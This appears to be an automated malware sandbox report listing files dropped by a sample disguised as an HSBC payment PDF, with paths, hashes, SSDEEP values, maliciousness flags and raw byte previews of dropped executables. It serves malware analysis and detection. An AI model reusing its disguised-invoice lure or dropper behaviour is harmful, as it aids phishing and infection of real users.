Category: dropped
Size (bytes): 1512448
Entropy (8bit): 4.897886111511821
Encrypted: false
SSDEEP: 24576:QQVTZu0Jh/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vVTZuALNiXicJFFRGNzj3
MD5: 2EE59823DD833777D9445FCF955CF469
SHA1: 236325100CF38AE7A2043572E08C7BB58FB40A98
SHA-256: 834B8CF02287C49F1D7C40C4EAD7779C29140E8E650198E4695F3020FB6A98AC
SHA-512: 48EC9C4D50126E6EA7BDE73B82837179D89692F9AA3B9B6A24CC22A410BA89AD4514DFCC810FC5012E26F8D6AB2179D2591BEC081D196490B1E4A7E1FBC1D203
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 1344000
Entropy (8bit): 6.798378998671327
Encrypted: false
SSDEEP: 24576:XC1vpgXcZ/zv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:XC1vpIc9vLNiXicJFFRGNzj3
MD5: 2575A6071E7B2F217D3CCC777C8DEA64
SHA1: 76782370B6C2EF1990B1BC26586DAD87E2E573B7
SHA-256: AC44FCD5473A2927B826504B6DA4B50D19EA769E83A78EDFE41B697B86D30AF6
SHA-512: 94BE254F1EBE6AA87C82B8763E7D0570921C3780FAC0226B903813C86F6921942DB48B718A0FCF05EB34BA8E7314468EEA7CB85807FB167D8F48FE790B1459E0
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 1355776
Entropy (8bit): 4.6511426773040885
Encrypted: false
SSDEEP: 24576:/S7/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CLNiXicJFFRGNzj3
MD5: 2A372B8E403400EAA151AF673EFE0ADC
SHA1: 664D95837ECAE1F2291E12238456D68099972159
SHA-256: 7884AA219D1465C1C4016438348154CF793F89BB0925ECE33FC6C7034B3C2F9D
SHA-512: 26509D1E4E06C378767E7043CF036018B97FE2CD92371A45A8F2A43DE4533171ED549574DCF28D9F551D61D42681C16DE956CFFBAB5B35C5B588B25781C2EE3C
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1564160
Entropy (8bit): 5.002299084189597
Encrypted: false
SSDEEP: 24576:fWDntIfGpR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:eZIe3LNiXicJFFRGNzj3
MD5: 6F6DF32E22BE5DB805863842BDD15A64
SHA1: 723904FECBCA2EABE799D2775082004AAB3FAE7D
SHA-256: FF24D36E5A88F22BFD69CEB19D299534B930B7BD2B5B5068285E75188B1D7B2B
SHA-512: 66B31EEBFD06B54AA8858B221339D85048854E650FE07402E3D1DA38C671A0F60B7DC034C93D337FF469DFF81BAED75989B322F3A3DA51EECB6C257C9A87870D
Malicious: true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1340928
Entropy (8bit):4.611608218070923
Encrypted:false
SSDEEP:12288:rIhjiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:KX/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:FE8EE071E09DE5224FDA5EF3BD5DDE7B
SHA1:CE660E4CCBF85072083684B11FC6304C53D9A128
SHA-256:3857F64E1F23E2B07AE9E228C759DA8BC7ECCD314D477A2BBCEE629459AE6E1C
SHA-512:21C5FA4C41EC8362ED97862C972AE7C8D320E8CAC7FB67B6C9A63499858AE27BF4E3E928C7D473C807D64242BFE9223AEF94FE75D9E700B7FB38AD55EFB6D259
Malicious:true
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................^..... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...`...0......................@...........................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1687552
Entropy (8bit):5.0153845307020575
Encrypted:false
SSDEEP:24576:w8oRswt2ioQ3J+Ry/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:w8oRxoFyLNiXicJFFRGNzj3
MD5:CA98D11B1ABD2F34A56ED16D1D9AF046
SHA1:5B670257D001170FD4AF14F0C36E1E33D250DE01
SHA-256:31E725904850485E6DFCDC88F25E3BED1A8A84A4768D4F4CD6B2219CD963ABAF
SHA-512:79778B9F78B16F149EAAB230B01D72F816957C0240FFFF59E70D9DD12A84A930F9E5C8A776C8C40E93784A7269EBE536C42096F3B11FD44EE169D0E0D9EAF570
Malicious:true
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@..............................%........... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...`........... ..............@...........................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1497600
Entropy (8bit):4.791078378932267
Encrypted:false
SSDEEP:24576:hf8HQlTMxHwJ07wR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:hkHQlawJ0SLNiXicJFFRGNzj3
MD5:3206E24DCAD73836B9178A36081FFB69
SHA1:320E6231177189C712F501D981B177277DE0F87E
SHA-256:6044914105C99FCEE2FF053C8590198B94D5794FEC9C74552C7D27A235ED0990
SHA-512:66630DB53E84E7A0FFEAFCABE5D6BBD289832C53102484F31B25BDE7DC36F7A2D8C0FA3BF9CE830C2DB8422FE7746F286A430FACFF44E3BBF8D47833AB9EA595
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@..............................!.......... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...`...........:..............@...................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1534464
Entropy (8bit):7.1171717558806495
Encrypted:false
SSDEEP:24576:mSEmYD6gjGPG45QVDkfX4lyTyB/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:m5mYD6g2GWQVQfeyTmLNiXicJFFRGNzb
MD5:255C15D8B8FBDFB400C23AFF35A08C46
SHA1:E5CAA82ECA9EA9AFD09698FC450D54BF33158D5F
SHA-256:A3B9757B12365F766D6DC75C51032361D60A464AC8F868E6D507336254314050
SHA-512:8AF2499913A8DCA8F9BBD3593FC32FA3B17EEB4AF9F10428C5FCF2D76774FB933D8C1AA6DA1208938B5B4F722D76C9EB62453692EF2CCD5B57DCC1A4C7266972
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@......................................... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:data
Category:dropped
Size (bytes):93696
Entropy (8bit):6.839650012638765
Encrypted:false
SSDEEP:1536:vhdlOFKMD4R2BfFo8PAsCkloIirECXlhfavrUhKyt+EFGu4TmC8WtLNjN2Q5BS55:ZdUFBa2VNPAsCkloIirECXlpazzytlFt
MD5:1C761A6889D1FEF7FB0ECE8A758C2E24
SHA1:1F54C6F04E43FEEEBA01C891D122C8D14F754F0E
SHA-256:2FA75C8DA11FD0852903A69F6E96B62A19C4C40BE558BDF93A06CA0DA4D5ED7F
SHA-512:60DC90F1D335D818D1409E224E3EECD56EBA46430559C8188D1F20C2CCD4D735BFF70EF7CF06B6B0D9E1F53F00FF96F10857C4F072C947CEA532F5A2CCFCDBA7
Malicious:false
Preview:.c.NF4NCTUOP..W9.8XICJP9uNE4NCPUOPLIW9X8XICJP95NE4NCPUOPLIW9.8XIMU.75.L.o.Q..q.!>JxH*&$81T.-$Z ,$u-5l;"WxQ6i....X!!Q`N]_kPLIW9X8..CJ.86N..;.PUOPLIW9.8ZHHK.95*D4NKPUOPLIY.Y8XiCJP.4NE4.CPuOPLKW9\8XICJP91NE4NCPUO.MIW;X8XICJR9u.E4^CPEOPLIG9X(XICJP9%NE4NCPUOPLI..Y8.ICJP.4N.1NCPUOPLIW9X8XICJP95.D4BCPUOPLIW9X8XICJP95NE4NCPUOPLIW9X8XICJP95NE4NCPUOPLIW.X8PICJP95NE4NCXuOP.IW9X8XICJP9.: L:CPU[2MIW.X8X-BJP;5NE4NCPUOPLIW9x8X)m8#KVNE4.FPUO.MIW?X8X/BJP95NE4NCPUOP.IWyvJ=%,)P99NE4N.QUORLIWUY8XICJP95NE4NC.UO.LIW9X8XICJP95NE4..QUOPLI.9X8ZIFJH.5N.NCSUOP.IW?8.XI.JP95NE4NCPUOPLIW9X8XICJP95NE4NCPUOPLIW9X8XI.7.6...]=.UOPLIW8Z;\OKBP95NE4NC.UOP.IW9.8XItJP9.NE4#CPUkPLI)9X8&ICJ495N74NC1UOP.IW978XI-JP9KNE4PAxJOPFcq9Z.xIC@P..=d4NI.TOPH:u9X2.KCJTJ.NE>.@PUK#hIW3.<XIG9u95D.1NCT..PO.A?X8C&{JP35M.!HCPNevLK..X8RIilP:.[C4NXzwOR.@W9\..:^JP?..E4D7YUOR.CW9\.FKk.P9?dgJ]CPQdPfk)-X8\bC`rG NE0eCzw1FLIS.X.z7TJP=.No2d!P'.\L9TV98XOk.P9?f.4NEP.uP2GW9\:7.CJZ...E..CPSOx.IW?X..ICLP.aNE2Nk.UOVLcm9phXIEJxh5NC4d.P+|PLM{>&.XIGaFG.NE0.E(U

Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:data
Category:dropped
Size (bytes):66002
Entropy (8bit):7.90342236913907
Encrypted:false
SSDEEP:1536:IJb6y284yhgw/ADEeO3y78Cao7uzASH6MgoUuM5KA:S6ySw/oguviU4V7UvKA
MD5:F418B8319DF2AB33B43527D34B55BAF5
SHA1:D2CF1272C89E2CCCA3084036C90E7173A07B6D4D
SHA-256:C7CFBBF8F4ED0BE863D33CD9CE9979E72295F6E117CF5BAA6DEF6AD1D8033C34
SHA-512:FDFB1D75CECA401710BE833186EB7AE130089C2FE9091BF3B7172B34CF77900FE33DCE4BA507C16E02442A14AB1A6D73F8859763D077659E7CDE2B6FBCD8D63A
Malicious:false
Preview:EA06..n......4.C.Ui....9.N+...*.9.....@.X.Rj....f....`.X..}Sy......1...1!.R...T.I8.."..%jA,.]e.[d.EW.Tf.<....Hd5..:._..,f.......;......5..V...\.s5.Q&..X..+;...i..33@.B.C.]@..]^s\.....k[.m&.;...Jsu..f...B.....5.@.f$.....+3..$.c.9.....M(@!.......N*....X.@....R.d........b[B.T'`....qX..g.:]X.X.Q.....a?.,%. ...I..n..Y).Ng ....U.....d.k..Ui. ...}..7Q..b.I.R..y.;..P.`..X...}k.......-p&.......}...lN+S..>.B.,..X..........D....... .@..0..4.,&..........p..Z.XR......J..(.;....Rht..O.=.M)..R.P.N.....K.....:.>.P*.Z\..I........u..h.P.B....).z..QC.^.U......(u.u..L......J.i.T'\...iN.^....2...D...*.?..(.J$...s(`....k..'3.%..]..*6J...)..'.....r..).Y...z..h..MN%X.^..JUB{..[.VI.BO.S'5J..qX.....E....T/.Z....N....*....(..%..S..#@?LB.I..*...:.2.Z.Z}Z.c..n...&.J.Z&......J..e6.>.B.<.......6.Y@.a?...5(.b..<Ds@#.:....4.MFsp..!W@.&...Ui5.$..9.N....*.9..(.JE....v)7.=bup..M...6q..J*..m..W...\....Y. ...g..)5...MZ..X...mA.P..[.............!b.......~.9..(.y.\..L.@....I..R.Db.4.Z

Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:data
Category:dropped
Size (bytes):12320
Entropy (8bit):7.984711361270375
Encrypted:false
SSDEEP:384:yOgIimdNU4bytvYBRob6VVsCimaCoG2AufUwmd9:yOfU4SABhVhhaCoG2Ahhd9
MD5:4B33699EC5A72B35AF5171EAF0A7C245
SHA1:A0433EF2DE201AC98719460185849D8E2A481037
SHA-256:F50BA2CB155981030224D94CEDF0C4F35C74FAA59538C67298CE41025D5EDD5D
SHA-512:7C7A179B40A097321EE27BBDD91AEEA42885F6767F7B094230014E57AA87FE6AF605FF392C16F5F8851CF81386A061B8AF4F61F8C096046D4F777B7B6542EE65
Malicious:false
Preview:.....s?G.].....9FC....n$cp .r.....gQ(........$IH.... %a.- .....a......6W..3....t.D.\}_5)..<...,.#.j/..;...I..w1..._$.T~i..=..w.U...J.S....$0Xm..LD(.l..N....&.s...O...p%.gJ.R4..q.H#N.'..R..3...J.;.iIy..I...:..N....J..H..t3N..N.._... h9..0..d......?......;~x..F...z..6/.+<....'.7._....b..:{.D...9...5.NYp.k..lv.....KR.a.b.1.....E....H..<&...Xg[....6Q..Y9.t....S..w.T.C.s.>JAdt.@l..B.L@t.....$.]sd.y..F.}..`m..]J([4B....psz)..B..c......1O..{7_...Ay...o..V.9../UY..'.:=..M....Q..h]<2.Vn.{......H.0w.._~../.hP..Z.........6c7(...Q.\0k0..SO..#.V;Me.8.+>..<x.D*0.h=...~eh..7]....%...4......$)=.n.L.}....bj....:.Hd.m.....K. @...P....,9........@.I~m.C.-....T..lS.......Z(x.U..t....k...r.....t....D.n..4..l+U...2....._0Pa.............{.).H..;_..:....;7vx.._...?.[..s..V..59OW..#*.w.....'.w<w.]..w.K.|..jY..L...gi.0@7....{M....X34........GC.._......A0.<..).\.|.+.}..v..|.[...{7........Y}N6C1p....=.,...JB\.|......7.l...x.(....>..........u+.*..DB.'CQQ.$..B..VE..>.+..v..

Process:C:\Windows\System32\msdtc.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):2313
Entropy (8bit):5.133468948582604
Encrypted:false
SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786W:Z070s0Y0q0mF7Dm51
MD5:AC1D4010B78250EFA82F461C1EF0B5CA
SHA1:0AFEBFC203760E9AEADE87170E61B75724C48BD3
SHA-256:987E68A6BFBF1F96C2254ADC3F2385FB1DD9F533633278C1811A1D45B6CD35E3
SHA-512:4C259B3FCFAACBD56DC8EF603BCC4CE685F800DD8DC543560F14C09A6282C91AED2F5FA8379F6A2154C168E301B342812399A5BE8223A839D706E8B3D0A64C01
Malicious:false
Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

                                                                                                                                                                              Process:C:\Windows\System32\wbengine.exe
                                                                                                                                                                              File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "\322h\266\203"
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                              Entropy (8bit):0.9478489356175586
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:+zb/d4ZTyVPuvPLAr6oxeJ2q6o/46AP3ePfIPHSPvJmspsSuPobaG7/b/Q3:E/d4lrA/IJ2q6o46gaJyPd3
                                                                                                                                                                              MD5:3D2A912DE78A048219682B0B55E4E4AE
                                                                                                                                                                              SHA1:554B6E0215905CBCAF8B828E0E6F1F9EDAA5320A
                                                                                                                                                                              SHA-256:2BA1BF23ADD439DE48B411B3EE99C40A5A97B3E8E8EDF9674E851B06DA9F06B7
                                                                                                                                                                              SHA-512:07C293C904FB3C3A357EC21EB01631F17E8D97F882FED920FC3A42F5F35EB33E19DD936EDCE2F6146E3DE70A6CFC3F64BE197F1BCFB5958754E9E965004B0BF0
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):12320
                                                                                                                                                                              Entropy (8bit):7.98516147391507
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:139GJoABN+O3dXPqD+Z3F2jqyA91lQePSNW1As7HT2:139erN+O3dSDk1l9QeKM1As6
                                                                                                                                                                              MD5:7DD7B5782CC8EADCBB8E34EB3AACFEC0
                                                                                                                                                                              SHA1:367BB80E851D78A34BF8A9FB477B7536E4C1A4F0
                                                                                                                                                                              SHA-256:2782D170E68993E0331E3E259CCFC49C30CC60E6F9D2DF3F0985DFB2A53D5EA8
                                                                                                                                                                              SHA-512:DFBE8643A6D813EC22526952A5F6E7EB37802251F986ADF41CC78FD95A1278DD7C3764FCE05345D888C253085AE747AB140509B552CB2CB25DA460E4D32C0CCF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1306624
                                                                                                                                                                              Entropy (8bit):4.538205713913881
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:VfiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Vr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:A01D0D18438CEA05470B157B11E94B3F
                                                                                                                                                                              SHA1:94707EAE8DC2E133D29E04F704F4FC68295A940B
                                                                                                                                                                              SHA-256:4E12D36ADEAEE5B8AAC138B2CE38CE3466D81160F25C35C83DD90F5948D0B929
                                                                                                                                                                              SHA-512:9EEF64F7D2B28B50CFC6F74C0274F660DC0F309F478522EC0AE9D97E065727D9E7B4C6320CB3B6E4B8EA35511E402E92E8B4D32EF973B37405E43EA5BB2FC54E
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1801216
                                                                                                                                                                              Entropy (8bit):6.967182536486352
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:iwVFr68Vw9wn/6h8p1zidVLNiXicJFFRGNzj3:iwVFrssCndV7wRGpj3
                                                                                                                                                                              MD5:8311FBEB6995BA81570173720F2B188B
                                                                                                                                                                              SHA1:A3EA926C558B12D0183D383132913441006E2C8C
                                                                                                                                                                              SHA-256:C67F893C73881CBFE5881EF7B7049C73414FCB7380846C2F9D548336E4094C2F
                                                                                                                                                                              SHA-512:02050F1F705F5357C3800B9106A0DA2967BCCD3A37CDF6358B83411F5CDF1A199963DBE5C7A7F859E4BA29909594538C70FFC00B0D4235222C9D5D03E83B442D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1348608
                                                                                                                                                                              Entropy (8bit):7.2434010074497355
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:OQW4qoNUgslKNX0Ip0MgHCp+MBOuz/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OQW9BKNX0IPgi8MBOuzLNiXicJFFRGNf
                                                                                                                                                                              MD5:FEBB8A1C8444E585D00E9798A241F535
                                                                                                                                                                              SHA1:D6167EEEE0A3914A0FA67F6C64470607AABABF2E
                                                                                                                                                                              SHA-256:B432B4ADD726A4522C592580B1EB55DFF7F71D86187AA8834B2D8488702A18C4
                                                                                                                                                                              SHA-512:851B5F1A848194ECB41BA43D73B9C0E99A8E5E689B4719806980133AE0E7FACDAB80166BF7A6854A5DB1E0893A6B8EB291016A2D0EEE365206C719460DDE3501
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1379840
                                                                                                                                                                              Entropy (8bit):4.681742274303295
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:12G7AbHjk0/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:12G7AbHjlLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:715FCD651D1C387B372D171CB6780B86
                                                                                                                                                                              SHA1:21C0910CF71F71F0E642958647E4797F7E1EB799
                                                                                                                                                                              SHA-256:E614B6E719265DEA7B0C365DC712173D8C84B37204AC9F87D45E30512F5DE754
                                                                                                                                                                              SHA-512:EAAF015B10D3D005F1ED37B17E557E1659181E90CDE91A23F0E7524EAC796F563F107DBBD927A9EE395B2E5BECB8AFB2B9E8821210489AE22FB2E87FF6BD2857
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1242624
                                                                                                                                                                              Entropy (8bit):7.28022955368704
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:QkdpSI+K3S/GWei+qNv2wG3s/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Q6SIGGWei2wG3sLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:B19D2C88C8C42BA1F4C83060C439AAFE
                                                                                                                                                                              SHA1:87666F99BB9ECDC6DCECA8B0298F1B11F1EC234C
                                                                                                                                                                              SHA-256:EBB4821230948E97D93F305A03BD78E1BC2EB540F1F2B509040F4BA73B1CC547
                                                                                                                                                                              SHA-512:79890544749BB6EE4CDC8BF6B6D3B552E65310D054B6D53F5468D03E68D2D4BED1F1D9861ECA58D86F8D07E9CC2BA73D43619EBBA7337D79D881A502A22F4ED3
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1296896
                                                                                                                                                                              Entropy (8bit):4.515592491141312
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:8TiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:8n/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:27C76B862642ACB46AB7DEFBFD73BFA7
                                                                                                                                                                              SHA1:EFDBBA87271430C9E85F0C09FF292BC570D78073
                                                                                                                                                                              SHA-256:7D32C93BBEB70525D2ACBFDE6B885851982B48120F64DEC45886B856C45D132D
                                                                                                                                                                              SHA-512:A12509B4FCA53EDE3A439653FE8033F2E535D11B2FF75F7AD634A2E0D33542BA7C561514C5FFD658E1E0D1A56B57CD657BD2F88693695984FC9F8D261EE69063
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                              Entropy (8bit):0.3234733658880588
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:zfl180kqF69Fq5zzRj6CzE5Z2+fqjFHfl3:rY1WiY+fC/F
                                                                                                                                                                              MD5:D061D1B03DA7C5A9384B0851D5C5447E
                                                                                                                                                                              SHA1:2A0997D859FBB539DAF8B15628C2B27FF1B220C8
                                                                                                                                                                              SHA-256:8D50748EA111252CDF3075CA86BF0CB0835DE20DE85CAA49FF9A3C854B92E3AB
                                                                                                                                                                              SHA-512:94085323662EC03F7F4AA385344491FAA9B7F2CAB0F2C6E02E9F32DCDF7E1956C78C7E172579EC6BAA2F15684AD16EB1CF41615ACFDEAA4E37C6D44879941605
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.@..X...X.......................................X...!...........................(........................@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............0..U.K..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1667072
                                                                                                                                                                              Entropy (8bit):4.823186761048377
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:oAL3UTP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:oAL3UTLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:2DAADB2D9EE99D7F3C6EB0FA254025A1
                                                                                                                                                                              SHA1:56D03E371725C0E9D29979440983A99F2642215E
                                                                                                                                                                              SHA-256:6DD3F2E44952168E20172BD30A343F1BEA5B1281EE431090ABDB393179F43BBE
                                                                                                                                                                              SHA-512:9A6F1D5AFD35069708A77C337C28107E76149CD97E7F98C2E4B8AE3EBA31453B8F3E8D57C4D52752DB579154FAB6EFD97BAF68399E3FDC6A3B4FCE5B1E3C6477
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@..............................%........... ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...`...0......................@...........................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1391616
                                                                                                                                                                              Entropy (8bit):4.703231452438177
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:GOw/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:GOwLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:F3D51ACFF199999586D8F7FCE77371CB
                                                                                                                                                                              SHA1:9B709822860AEF97057C0180F97883327E4E194A
                                                                                                                                                                              SHA-256:2B6F58302BC86D2C37AF77505C9E6C41B6BD87FBD8894755FBC364F1239E3241
                                                                                                                                                                              SHA-512:79A2EE116CEC9B52388025B9967E9EB160B666690D1213CD3D883932AFE5E04B64868344C23C113934509B7DBA3B7C95094159669639704AECC198EC95E59A55
                                                                                                                                                                              Malicious:true
